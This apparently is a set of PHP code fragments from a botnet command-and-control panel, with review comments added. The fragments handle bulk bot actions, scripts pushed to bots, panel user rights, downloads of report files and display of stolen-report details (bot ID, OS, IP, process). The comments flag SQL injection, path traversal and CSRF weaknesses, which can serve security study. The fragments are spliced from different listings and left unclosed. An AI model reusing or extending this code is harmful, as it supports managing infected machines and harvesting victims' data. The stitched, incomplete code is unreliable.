Example #1
///////////////////////////////////////////////////////////////////////////////////////////////////
// Bulk-action handler: runs when a request carries both an action name ("botsaction")
// and a non-empty array of bot IDs ("bots"), each taken from either GET or POST.
// NOTE(review): this fragment is cut off by the listing; the two outer `if` blocks opened
// below are not closed within the visible lines.
if ((!empty($_GET['botsaction']) || !empty($_POST['botsaction'])) && (!empty($_POST['bots']) && is_array($_POST['bots']) || !empty($_GET['bots']) && is_array($_GET['bots']))) {
    // Flag derived from the current user's 'r_edit_bots' right; not read again in the visible fragment.
    $bedit = empty($userData['r_edit_bots']) ? 0 : 1;
    // Action name: GET wins over POST. Only non-emptiness is checked here, not that it is a string.
    $ba = !empty($_GET['botsaction']) ? $_GET['botsaction'] : $_POST['botsaction'];
    // Bot ID list: POST wins over GET; duplicates are dropped.
    $blist = !empty($_POST['bots']) && is_array($_POST['bots']) ? $_POST['bots'] : $_GET['bots'];
    $blist = array_unique($blist);
    // Check whether the requested action is permitted.
    // The action is accepted only if it equals the first element of some $botMenu entry;
    // entries whose first element is integer 0 are skipped.
    // presumably $botMenu is built per user from their rights (it is defined outside this fragment; verify).
    $deny = true;
    foreach ($botMenu as $item) {
        if ($item[0] !== 0 && strcmp($item[0], $ba) === 0) {
            $deny = false;
            break;
        }
    }
    if ($deny) {
        ThemeFatalError(LNG_ACCESS_DEFINED);
    }
    // Build the list of bots for MySQL: an OR-joined chain of `bot_id`='...' comparisons.
    // NOTE(review): addslashes() is not a connection-charset-aware SQL escape, so this is string-built
    // SQL from request data; a parameterized query (or an IN list of bound values) is the robust form.
    // $sqlBlist is not consumed within the visible fragment.
    $sqlBlist = '';
    $count = 0;
    foreach ($blist as $bot) {
        $sqlBlist .= ($count++ == 0 ? '' : ' OR ') . "`bot_id`='" . addslashes($bot) . "'";
    }
    if (strcmp($ba, 'fullinfo') === 0 || strcmp($ba, 'fullinfoss') === 0) {
        // makefavorite: toggle the `favorite` flag of one bot and echo the new value, then stop.
        // NOTE(review): the ID is re-read from $_REQUEST['bots'][0] rather than from the de-duplicated
        // $blist above; $_REQUEST can also carry cookie values depending on request_order.
        // NOTE(review): this state-changing UPDATE is reachable through GET parameters and no
        // anti-CSRF token check is visible in this fragment.
        // NOTE(review): neither mysql_query() result is checked before use, and the mysql_*
        // extension was removed in PHP 7.0.
        if (isset($_REQUEST['makefavorite'])) {
            $botIdQ = mysql_real_escape_string($_REQUEST['bots'][0]);
            mysql_query('UPDATE `botnet_list` SET `favorite`=IF(`favorite`=0, 1, 0) WHERE `bot_id`="' . $botIdQ . '";');
            echo mysql_result(mysql_query('SELECT `favorite` FROM `botnet_list` WHERE `bot_id`="' . $botIdQ . '";'), 0, 0);
            die;
        }
 // Get the script data.
 // Populates the $f_* form fields from one of three sources: the submitted POST values
 // (when validation errors exist), an existing `botnet_scripts` row (view or copy), or defaults.
 // NOTE(review): this fragment starts mid-file and is cut off by the listing before the last
 // `else` branch closes.
 if (count($errors) > 0) {
     // Re-display what the user submitted. Values pass through htmlEntitiesEx() first
     // (defined elsewhere; presumably HTML-escapes for output, so confirm).
     $f_name = htmlEntitiesEx($_POST['name']);
     $f_is_enabled = $_POST['status'] > 0 ? true : false;
     $f_limit = intval($_POST['limit']);
     $f_bots = htmlEntitiesEx($_POST['bots']);
     $f_botnets = htmlEntitiesEx($_POST['botnets']);
     $f_countries = htmlEntitiesEx($_POST['countries']);
     $f_context = htmlEntitiesEx($_POST['context']);
 } else {
     // Loose comparison: any $_GET['new'] value other than -1 selects the "copy existing row" path.
     if ($is_view || $_GET['new'] != -1) {
         // NOTE(review): the row id comes straight from the query string and is only passed through
         // addslashes(), which is not a charset-aware SQL escape; for a numeric id an integer cast
         // or a bound parameter is the safer form.
         if (!($r = mysqlQueryEx('botnet_scripts', 'SELECT name, flag_enabled, send_limit, bots_wl, bots_bl, botnets_wl, botnets_bl, countries_wl, countries_bl, script_text, extern_id FROM botnet_scripts WHERE id=\'' . addslashes($is_view ? $_GET['view'] : $_GET['new']) . '\' LIMIT 1'))) {
             ThemeMySQLError();
         }
         // '@' hides fetch warnings; a missing row is reported through ThemeFatalError().
         if (!($m = @mysql_fetch_row($r))) {
             ThemeFatalError(LNG_BOTNET_SCRIPT_E1, 0, 0, 0);
         }
         // Column order follows the SELECT list: 0=name, 1=flag_enabled, 2=send_limit,
         // 3/4=bots_wl/bots_bl, 5/6=botnets_wl/botnets_bl, 7/8=countries_wl/countries_bl, 9=script_text.
         // extern_id (index 10) is selected but not read in the visible fragment.
         $f_name = htmlEntitiesEx($m[0]);
         $f_is_enabled = $m[1] > 0 ? true : false;
         $f_limit = intval($m[2]);
         // SQLListToExp() is defined elsewhere; it receives the allow-list and block-list column
         // pair, presumably merging them into one editable expression (verify).
         $f_bots = htmlEntitiesEx(SQLListToExp($m[3], $m[4]));
         $f_botnets = htmlEntitiesEx(SQLListToExp($m[5], $m[6]));
         $f_countries = htmlEntitiesEx(SQLListToExp($m[7], $m[8]));
         $f_context = htmlEntitiesEx($m[9]);
         // When copying (not viewing), the prefix is added after escaping.
         if (!$is_view) {
             $f_name = 'Copy of ' . $f_name;
         }
     } else {
         // Brand-new entry: default name from CURRENT_TIME, enabled, limit 0.
         $f_name = 'script_' . CURRENT_TIME;
         $f_is_enabled = true;
         $f_limit = 0;
Example #3
 // Populates the user-edit form ($formName, $formEnabled, $formComment and the $rights flags)
 // from the submitted POST values, from an existing `cp_users` row (edit or copy), or from defaults.
 // NOTE(review): this fragment starts mid-file and is cut off by the listing before the last
 // `else` branch closes.
 if (count($errors) > 0) {
     // Validation failed: re-display the submitted values.
     // htmlEntitiesEx() is defined elsewhere; presumably it HTML-escapes for output (confirm).
     $formName = htmlEntitiesEx($_POST['name']);
     $formEnabled = $_POST['status'] > 0 ? true : false;
     $formComment = htmlEntitiesEx($_POST['comment']);
     // Each key of $rights is looked up directly as a POST field name; a positive value sets the flag.
     // NOTE(review): $v is bound by reference and no unset($v) is visible in this fragment, so a
     // later write to $v would modify the last element of $rights.
     foreach ($rights as $k => &$v) {
         if (isset($_POST[$k]) && $_POST[$k] > 0) {
             $v = 1;
         }
     }
 } else {
     // Loose comparison: any $_GET['new'] value other than -1 selects the "copy existing user" path.
     if ($isEdit || $_GET['new'] != -1) {
         // NOTE(review): the row id comes from the query string and is only passed through
         // addslashes(), which is not a charset-aware SQL escape; an integer cast or a bound
         // parameter is the safer form. SELECT * also loads every column of the user row,
         // including any not needed by this form.
         if (!($r = mysqlQueryEx('cp_users', 'SELECT * FROM cp_users WHERE id=\'' . addslashes($isEdit ? $_GET['edit'] : $_GET['new']) . '\' LIMIT 1'))) {
             ThemeMySQLError();
         }
         // '@' hides fetch warnings; a missing row is reported through ThemeFatalError().
         if (!($m = @mysql_fetch_assoc($r))) {
             ThemeFatalError(LNG_SYS_USER_E1, 0, 0, 0);
         }
         $formName = htmlEntitiesEx($m['name']);
         $formEnabled = $m['flag_enabled'] > 0 ? true : false;
         $formComment = htmlEntitiesEx($m['comment']);
         // Rights are read from row columns that share their names with the keys of $rights.
         // Same by-reference loop as above; no unset($v) follows within the visible lines.
         foreach ($rights as $k => &$v) {
             if (isset($m[$k]) && $m[$k] > 0) {
                 $v = 1;
             }
         }
         // When copying (not editing), the prefix is added after escaping.
         if (!$isEdit) {
             $formName = 'Copy of ' . $formName;
         }
     } else {
         // Brand-new user: default name from CURRENT_TIME, enabled.
         $formName = 'user_' . CURRENT_TIME;
         $formEnabled = true;
Example #4
    $_FILTER['path'] .= ($_FILTER['path'] == '' ? '' : '/') . $_GET['sub'];
}
// Reject the request if the accumulated relative path fails the pathUpLevelExists() check
// (helper defined elsewhere; presumably it detects ".." segments, so verify).
// NOTE(review): this is a deny-pattern check on the request string. The resolved path is never
// compared against the reports root (e.g. via realpath()) in the visible code, so containment
// depends entirely on that helper being complete.
if (pathUpLevelExists($_FILTER['path'])) {
    die('WOW!');
}
// Current directory: the configured reports root, optionally extended by the request-derived sub-path.
$_CUR_PATH = $_FILTER['path'] == '' ? $config['reports_path'] : $config['reports_path'] . '/' . $_FILTER['path'];
///////////////////////////////////////////////////////////////////////////////////////////////////
// File download.
///////////////////////////////////////////////////////////////////////////////////////////////////
// Serve one file from the current reports directory as a download, then stop.
if (isset($_GET['file'])) {
    // Same deny-pattern check as for the directory path; pathUpLevelExists() is defined elsewhere.
    if (pathUpLevelExists($_GET['file'])) {
        die('SUPER WOW!');
    }
    // NOTE(review): the final path is built by concatenation from request data and is not
    // canonicalised or checked to stay under $config['reports_path'] in the visible code.
    $fl = $_CUR_PATH . '/' . $_GET['file'];
    if (!@file_exists($fl) || !@is_file($fl)) {
        ThemeFatalError('File not exists.');
    }
    // NOTE(review): PHP has already URL-decoded $_GET, so urldecode() here decodes a second time.
    // The name handed to the header helper is therefore not the string that was validated above;
    // whether httpDownloadHeaders() sanitises it (e.g. strips CR/LF) is not visible here.
    httpDownloadHeaders(urldecode(baseNameEx($_GET['file'])), @filesize($fl));
    // Reads the whole file into memory before output; '@' hides any read failure.
    echo @file_get_contents($fl);
    die;
}
///////////////////////////////////////////////////////////////////////////////////////////////////
// Archive creation / file deletion.
///////////////////////////////////////////////////////////////////////////////////////////////////
// Bulk file action: requires a numeric 'filesaction' code and a non-empty array of file names.
// NOTE(review): this fragment is cut off by the listing; the `if` opened here is not closed
// within the visible lines and the actual archive/delete code is not shown.
if (isset($_POST['filesaction']) && is_numeric($_POST['filesaction']) && !empty($_POST['files']) && is_array($_POST['files'])) {
    // Every submitted name is run through the pathUpLevelExists() check before anything is done;
    // a single failing entry aborts the whole request.
    // NOTE(review): as with the download path, this is a deny-pattern check only; no canonical
    // path containment check or anti-CSRF token check is visible for this destructive action.
    foreach ($_POST['files'] as $file) {
        if (pathUpLevelExists($file)) {
            die('PUPER WOW!');
        }
    }
    // Deleting files.
    // NOTE(review): this fragment belongs to a different listing than the lines above it; its
    // enclosing `if` and the query that fills $m are outside the visible lines.
    // Base URL for links on this page: 't' and 'id' are URL-encoded, then passed through htmlEntitiesEx().
    $sub_url = QUERY_STRING_HTML . '&t=' . htmlEntitiesEx(urlencode($_GET['t'])) . '&id=' . htmlEntitiesEx(urlencode($_GET['id']));
    // Check the report type.
    $context = '';
    if ($m[14] == BLT_FILE || $m[14] == BLT_UNKNOWN) {
        // File-type (or unknown-type) report: show a download link instead of inline content.
        // The display name is the base name of $m[16], falling back to the literal 'file'.
        if (($file = baseNameEx($m[16])) == '') {
            $file = 'file';
        }
        $context = str_replace(array('{URL}', '{TEXT}'), array($sub_url . '&download=1', sprintf(LNG_REPORTS_VIEW_DOWNLOAD, htmlEntitiesEx($file), numberFormatAsInt($m[15]))), THEME_LIST_ANCHOR);
        $context = str_replace(array('{WIDTH}', '{TEXT}'), array('1%', THEME_STRING_SPACE), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $context), THEME_LIST_ITEM_LTEXT_U2);
    } else {
        // Any other report type: load the stored content and show it inline, passed through htmlEntitiesEx().
        // NOTE(review): $tbl is interpolated into the SQL text as an identifier; its origin is not
        // visible here. If it is derived from the 't' request parameter it needs a strict allow-list
        // (confirm against the code above this fragment). The id is only passed through addslashes(),
        // which is not a charset-aware SQL escape.
        $r = mysqlQueryEx($tbl, "SELECT context FROM {$tbl} WHERE {$tbl}.id='" . addslashes($_GET['id']) . "' LIMIT 1");
        if (!$r) {
            ThemeMySQLError();
        }
        // NOTE(review): mysql_num_rows() is the documented call for counting SELECT results;
        // mysql_affected_rows() is documented for INSERT/UPDATE/REPLACE/DELETE.
        if (@mysql_affected_rows() != 1 || !($cc = @mysql_fetch_row($r))) {
            ThemeFatalError(LNG_REPORTS_VIEW_NOT_EXISTS);
        }
        $context = str_replace(array('{COLUMNS_COUNT}', '{WIDTH}', '{TEXT}'), array(2, '100%', htmlEntitiesEx($cc[0])), THEME_LIST_ITEM_PLAIN_U1);
    }
    //Output.
    $data = str_replace('{WIDTH}', '100%', THEME_LIST_BEGIN) . str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, sprintf(LNG_REPORTS_VIEW_TITLE2, bltToLng($m[14]), numberFormatAsInt($m[15]))), THEME_LIST_TITLE) . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTID), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', botPopupMenu($m[0], 'botmenu')), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTNET), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[1])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_VERSION), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', intToVersion($m[2])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OS), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', osDataToString($m[3])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OSLANG), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[4])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIME), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[5] + $m[6]))), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIMEBIAS), THEME_LIST_ITEM_LTEXT_U1) . 
str_replace(array('{WIDTH}', '{TEXT}'), array('auto', timeBiasToText($m[6])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TICK), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', tickCountToText($m[7] / 1000)), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_RTIME), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[8]))), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COUNTRY), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[9])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_IPV4), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[10])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COMMENT), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[17]) ? '-' : htmlEntitiesEx($m[17])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_USED), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $m[18] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCNAME), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[11]) ? '-' : htmlEntitiesEx($m[11])), THEME_LIST_ITEM_LTEXT_U2) . 
THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCUSER), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[12]) ? '-' : htmlEntitiesEx($m[12])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_SOURCE), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[13]) ? '-' : htmlEntitiesEx($m[13])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . $context . THEME_LIST_ROW_END;
    themeSmall(LNG_REPORTS_VIEW_TITLE, $data . THEME_LIST_END, 0, getBotJsMenu('botmenu'), 0);
    die;
}
///////////////////////////////////////////////////////////////////////////////////////////////////
// Determine the data for the filter.
///////////////////////////////////////////////////////////////////////////////////////////////////
//When adding new parameters, the ones not needed for js:datelist must be destroyed.
$filter['date1'] = isset($_GET['date1']) ? intval($_GET['date1']) : 0;
$filter['date2'] = isset($_GET['date2']) ? intval($_GET['date2']) : 0;
if ($filter['date1'] > $filter['date2']) {